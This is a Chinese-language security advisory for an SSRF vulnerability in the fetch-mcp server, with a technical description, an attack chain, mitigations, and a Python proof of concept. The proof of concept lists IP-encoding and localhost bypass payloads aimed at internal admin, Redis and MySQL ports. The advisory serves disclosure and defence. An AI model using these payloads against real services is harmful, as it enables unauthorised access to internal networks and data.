CVE-2025-65513 fetch-mcp SSRF服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-65513

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

fetch-mcp

漏洞概述

fetch-mcp v1.0.2及之前版本存在严重的服务器端请求伪造（SSRF）安全漏洞。该漏洞允许未经认证的攻击者通过构造特殊的请求参数，绕过系统对私有IP地址的验证机制，从而访问内部网络资源。由于攻击复杂度低且无需用户交互，远程攻击者可以通过网络直接利用此漏洞。漏洞主要影响机密性，可能导致敏感内部数据泄露、内部服务暴露以及内网端口扫描等安全问题。fetch-mcp作为MCP（Model Context Protocol）服务器组件，用于处理外部资源获取请求，其对用户输入的URL验证不足是导致此漏洞的根本原因。在CVSS 3.1评分体系中，该漏洞获得7.5分（高危），属于需要重点关注和及时修复的安全风险。

技术细节

fetch-mcp在处理外部URL请求时，存在对IP地址验证的不完善实现。攻击者可以利用以下技术绕过私有IP限制：1）IP地址混淆：使用十进制IP格式（如2130706433代表127.0.0.1）、十六进制格式或IPv6表示法绕过字符串匹配检查；2）DNS重绑定：通过短TTL的DNS记录在验证后切换到内部IP；3）URL解析差异：利用不同URL解析库对特殊字符和编码的处理差异；4）域名跳转：通过短域名或URL重定向绕过域名黑名单。漏洞存在于URL验证逻辑中，当用户提交URL请求时，系统虽然尝试过滤私有IP范围，但由于正则表达式不严谨或解析逻辑缺陷，可被精心构造的输入绕过。攻击成功后，攻击者能够向内部网络发送任意HTTP请求，探测内网服务、读取内部数据、扫描开放端口，甚至可能利用内网服务的已知漏洞进一步扩大攻击面。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统中使用fetch-mcp v1.0.2或更早版本的服务

STEP 2

步骤2

攻击者发现fetch-mcp提供的URL获取功能接口（如/fetch或类似端点）

STEP 3

步骤3

攻击者构造包含私有IP地址或内网域名的恶意URL，利用IP编码绕过、十进制IP、DNS重绑定等技术绕过验证机制

STEP 4

步骤4

fetch-mcp服务器解析并发起对内部资源的请求，成功绕过私有IP限制

STEP 5

步骤5

攻击者通过响应内容获取内部服务信息、敏感数据或利用端口扫描探测内网开放服务

STEP 6

步骤6

若内网存在脆弱服务，攻击者可能利用获取的信息进行进一步横向移动和权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # CVE-2025-65513 SSRF PoC for fetch-mcp # Target: fetch-mcp v1.0.2 and before def test_ssrf_bypass(): """ Test various SSRF bypass techniques against fetch-mcp endpoint """ target_url = "http://target-server:3000/fetch" # Bypass techniques for private IP validation payloads = [ # Decimal IP encoding {"url": "http://2130706433/"}, # Octal IP encoding {"url": "http://0177.0000.0000.0001/"}, # Hex IP encoding {"url": "http://0x7f000001/"}, # IPv6 localhost {"url": "http://[::1]/"}, # Dotted decimal with padding {"url": "http://127.0.1/"}, # URL encoding bypass {"url": "http://127%2e0%2e0%2e1/"}, # Domain pointing to internal IP {"url": "http://internal.localtest.com/"}, # Alternative localhost representation {"url": "http://[email protected]/"}, # Access internal service {"url": "http://127.0.0.1:8080/admin"}, {"url": "http://127.0.0.1:6379/"}, # Redis {"url": "http://127.0.0.1:3306/"}, # MySQL ] for payload in payloads: try: response = requests.post(target_url, json=payload, timeout=10) print(f"Payload: {payload['url']}") print(f"Status: {response.status_code}") print(f"Response: {response.text[:200]}") print("-" * 50) except requests.exceptions.RequestException as e: print(f"Error with {payload['url']}: {e}") if __name__ == "__main__": test_ssrf_bypass()

影响范围

fetch-mcp <= v1.0.2

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）禁用或限制fetch-mcp的URL获取功能；2）通过网络层防火墙限制该服务的出站连接，仅允许访问必要的外部资源；3）实施严格的输入验证，对URL进行多轮检查和标准化处理后再验证；4）启用详细的访问日志监控，及时发现异常的内部网络访问请求；5）考虑使用专门的SSRF防护解决方案或Web应用防火墙（WAF）规则进行检测和阻断；6）隔离部署fetch-mcp的服务，确保即使被利用也无法访问核心内网资源。